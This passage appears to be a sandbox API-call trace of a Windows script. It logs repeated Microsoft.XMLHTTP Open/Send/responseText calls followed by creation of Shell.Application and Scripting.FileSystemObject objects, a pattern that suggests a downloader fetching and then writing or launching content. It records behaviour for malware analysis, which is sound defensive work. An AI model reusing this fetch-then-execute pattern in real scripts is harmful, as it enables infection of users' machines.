	[0429.442] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b50) returned 0x0
	[0429.443] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b50) returned 0x3
	[0429.443] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0429.443] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0429.443] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0429.443] longjmp () 
	[0429.443] longjmp () 
	[0429.443] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0429.443] SysStringLen (param_1=0x0) returned 0x0
	[0429.443] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0429.443] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0429.443] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74d0) returned 0x0
	[0429.443] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0429.443] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74d0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c08) returned 0x0
	[0429.443] ??2@YAPEAX_K@Z () returned 0x62f330
	[0429.444] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c08, pUnkSite=0x62f330) 
	[0429.444] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0429.444] XMLHTTPRequest:IUnknown:Release (This=0x49c5c08) returned 0x0
	[0429.444] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74d0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74d0) returned 0x0
	[0429.444] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74d0) returned 0x3
	[0429.444] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74d0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0429.444] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74d0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0429.444] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74d0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0429.444] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74d0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0429.444] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74d0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0429.444] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74d0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0431.456] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74d0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0431.456] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74d0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0431.456] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74d0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0431.456] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74d0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0431.456] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74d0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0431.456] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74d0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0431.456] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0431.456] SysStringLen (param_1=0x0) returned 0x0
	[0431.457] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0431.457] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0431.457] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x396820) returned 0x0
	[0431.457] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0431.457] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396860) returned 0x0
	[0431.457] ??2@YAPEAX_K@Z () returned 0x62f350
	[0431.457] Shell:IObjectWithSite:SetSite (This=0x396860, pUnkSite=0x62f350) returned 0x0
	[0431.457] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0431.457] Shell:IUnknown:Release (This=0x396860) returned 0x1
	[0431.457] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x396820) returned 0x0
	[0431.457] Shell:IUnknown:AddRef (This=0x396820) returned 0x3
	[0431.457] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0431.457] SysStringLen (param_1=0x0) returned 0x0
	[0431.457] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f000) returned 0x0
	[0431.461] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0431.461] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f000, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f030) returned 0x0
	[0431.461] FileSystemObject:IUnknown:Release (This=0x45f000) returned 0x0
	[0431.461] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0431.461] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f030) returned 0x0
	[0431.461] FileSystemObject:IUnknown:AddRef (This=0x45f030) returned 0x3
	[0432.118] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74d0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0432.118] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74d0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0432.118] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74d0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0432.119] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0432.119] SysStringLen (param_1=0x0) returned 0x0
	[0432.119] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0432.119] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0432.119] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74d0) returned 0x0
	[0432.120] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0432.120] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74d0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5bb8) returned 0x0
	[0432.120] ??2@YAPEAX_K@Z () returned 0x62f330
	[0432.120] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5bb8, pUnkSite=0x62f330) 
	[0432.120] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0432.120] XMLHTTPRequest:IUnknown:Release (This=0x49c5bb8) returned 0x0
	[0432.120] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74d0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74d0) returned 0x0
	[0432.120] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74d0) returned 0x3
	[0432.120] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74d0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0432.120] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74d0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0432.122] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74d0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0432.122] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0432.123] SysStringLen (param_1=0x0) returned 0x0
	[0432.123] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0432.123] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0432.123] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5c00) returned 0x0
	[0432.123] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0432.123] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c68) returned 0x0
	[0432.123] ??2@YAPEAX_K@Z () returned 0x62f310
	[0432.123] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c68, pUnkSite=0x62f310) 
	[0432.123] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0432.123] XMLHTTPRequest:IUnknown:Release (This=0x49c5c68) returned 0x0
	[0432.123] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5c00) returned 0x0
	[0432.123] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5c00) returned 0x3
	[0432.123] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0432.124] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c00, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0432.124] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0432.124] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0432.124] SysStringLen (param_1=0x0) returned 0x0
	[0432.124] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0432.124] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0432.124] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b90) returned 0x0
	[0432.124] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0432.124] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b90, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7578) returned 0x0
	[0432.124] ??2@YAPEAX_K@Z () returned 0x62f330
	[0432.124] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7578, pUnkSite=0x62f330) 
	[0432.124] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0432.124] XMLHTTPRequest:IUnknown:Release (This=0x49c7578) returned 0x0
